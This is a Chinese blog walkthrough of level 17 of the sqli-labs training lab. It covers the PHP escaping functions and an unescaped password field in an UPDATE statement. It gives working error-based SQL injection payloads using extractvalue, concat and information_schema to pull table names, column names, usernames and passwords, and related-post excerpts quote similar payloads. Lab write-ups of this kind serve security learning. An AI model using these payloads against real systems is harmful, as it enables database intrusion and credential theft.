Sqlilabs-17

最新推荐文章于 2024-05-16 22:14:02 发布
最新推荐文章于 2024-05-16 22:14:02 发布
阅读量866 收藏 5
点赞数 5
分类专栏: sqlilabs
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107178615
版权

来到了 17 关,从这关开始刚学习需要借助源码来配合学习,本关学习内容是 update 内容

5326f69f82a4d40141309e5c185c32a.png

从源码中可以看到,开发者的意图流程是:

325ef6d2f5e69727cee4fd998fd48a8.png

首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的…

继续往下看源码,你会发现 username 身上加了个check_input,转到 check_input 该函数看看:

f8a88f7347258292b1705c5c0a1d129.png

可以看到有三个不为人知的东西在上面…
b3393226497ee00714eab9fad230b91.png
这些都是个什么东西捏( ̄▽ ̄)*?
首先这里有个姿势需要 get:就是默认地 PHP 会对所有的 GET/POST/COOKIE 数据自动运行 addslashes() 函数,这是个什么东西呢?
addslashes()函数:一个会在预定义字符之前添加反斜杠的函数,即会帮助转义

预定义字符有:

  • 单引号(’)
  • 双引号(")
  • 反斜杠()
  • NULL

所以在平时过程中,咱就不用手动加转义字符了,但怕有些人进行了双层转义,所以可以使用 get_magic_quotes_gpc() 来进行检测,其参数为 string,string类型,内容为规定要转义的字符串,该函数返回内容为已转义的字符串,该函数适用于 PHP 版本 4.0+

第三个要介绍的就是 stripslashes() 函数,该函数可以删除 addslashes() 函数添加的反斜杠

最后就是 mysql_real_escape_string() 函数:
它将转义 SQL 语句中使用的字符串中的特殊字符

check_input 就对 username 做了各种转义字符的处理,使得我们再 username payload 注入毫无效果,所以无法像前几关那样对 username 直接下手,既然无法下手,那就转场到 password

072c0e7b51d5e59acfb23278b07417e.png

可以看到对 password 进行了更新操作,这其实就是一个改密码的功能嘛,我们在 username 输入正确的用户名,password 就是用来该密码的…
输入前:admin 密码为 admin:

8e4bd976706d46a0b3a8a0d7b45b3f5.png

输入 123 后:

58532055238ba06c55a3256fc835d3b.png

所以第 17 关本身提供的就是修改密码的功能,上面初步介绍了下开发流程,下面开始制作 payload

–查表
uname=admin&passwd=111' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '1&submit=submit

–查列
uname=admin&passwd=111' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e)) and '1&submit=submit

–查用户名
uname=admin&passwd=111' and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e)) and '1&submit=submit
1a6f8bb452d9d92ecd8cd2d3bfdde02.png
报错,因为后台对 users 表做了限制,不给你查名称是 users 的,那咱们就给它换个名字,加件衣服

–绕过
uname=admin&passwd=111' and extractvalue(1,concat(0x7e,(select username from (select username from users)a limit 0,1),0x7e)) and '1&submit=submit

–查密码
uname=admin&passwd=111' and extractvalue(1,concat(0x7e,(select password from (select password from users)a limit 0,1),0x7e)) and '1&submit=submit

😄

CrAcKeR-1
关注
专栏目录
sqli-labs 17
m0_69548793的博客
08-27 1336
sqli-labs 17
sqlilabs第17
wh1sper、的博客
04-29 1291
sqlilabs第17关一、分析二、手注 一、分析 这关题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
sqli-labs第十七关详解
金 帛的博客
04-26 4256
sqlilabs第十七关详解
sqli-labs 第十七关
qq_64302290的博客
05-13 975
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
sqli-labs(17
jimggg的博客
03-20 203
Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)
Sqli-labs靶场第17关详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 840
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 报错注入。爆出DBMS 所有数据库。
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1730
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sql注入-sqli-labs第17
weixin_46784800的博客
11-10 1674
sqli-labs第17关 updatexml使用 第17关的关键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
sqli-labs(15-19关)
weixin_55843787的博客
04-16 3087
sqli-labs靶场过关 源码分析
SQLi Labs Lesson17
1ame的博客
08-15 1154
Lesson - 17 Update Query - Error Based - String 首先进入欢迎界面: 本页面的作用是重置用户的密码。 本节对注入有过滤。 function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = sub
sqli-labs ————less -17
Fly_鹏程万里
05-12 876
Less-17源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&..
sqli-labs第十七关
yuqnqi的博客
05-09 304
查看源码,发现uname被检查了,passwd没有被检查 ,所以尝试使用通过passwd参数进行注入测试。
SQLI-labs-第十七关
最新发布
weixin_54055099的博客
05-16 1017
Sqli-labs第十七关,二次注入、报错注入
sqli-labs-----第17
wyzhxhn的博客
11-10 823
基于报错的更新查新。
SQL-labs的第17关——报错注入(updatexml)
qq_73393033的博客
07-20 528
这一关的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs-Less-17
giun的博客
02-13 524
这一关与密码有关,我们尝试下报错 输入username:admin password=1' 故对密码处理时应该使用“ 报错注入 username:admin password:1'and extractvalue(1,concat(0x7e,(select version()),0x7e))# version()可以换成其他语句进行注入 延时注入 username:admin pass...
sqli-labs练习(十七)--- POST-Update Query-Error Based-String
wkend的博客
07-28 461
在用万能密码进行登录的时候发现,username处无法绕过对密码的检查,总是登录失败。猜测后台对uname参数的值有过滤。导致无法注入。 使用正常方式进行登录,发现在前台可以修改用户的密码。 再次尝试,发现passwd出存在sql注入漏洞, payload:uname=admin&passwd=123'&submit=Submit,出现报错语句 于是在passwd出...
sql_labs第十七关
jgmgtdp的博客
07-15 410
做到了sql_labs的第十七关,之前的做的关卡都是可以经过一些尝试通过的,但是这关尝试了很多东西还是没有报错注入 只有通过代码审计查看本关的注入原理了 首先是看懂这个input_check()函数 之后我们要看看到这个,也是本题的解题点 这里我们可以看到,首先进行上传数据的判断,但是$uname是通过上面的input_check函数进行了相关的过滤,所以在第一个文本框是没办法输入的,但是密码并没有进行相关的过滤。 所以本关的重点是在密码框这里。 可以看出在得到row变量的之后,如果不为空,代码将要使
Sqlilabs-Less38-
09-23
Sqlilabs-Less38是一个关于SQL注入的实验题目。在这个实验中,你需要通过注入恶意的SQL代码来获取敏感信息或者修改数据库中的数据。 在这个具体的实验中,通过输入一个id参数,我们可以在URL中进行注入。在第一步中,我们尝试闭合单引号来看是否存在注入点。在第二步中,我们尝试使用恶意的union select语句来获取数据库中的信息。在这个例子中,我们使用了"-2") union select 1,2,3 --"作为注入代码。通过这个注入代码,我们可以判断当前数据库的一些信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值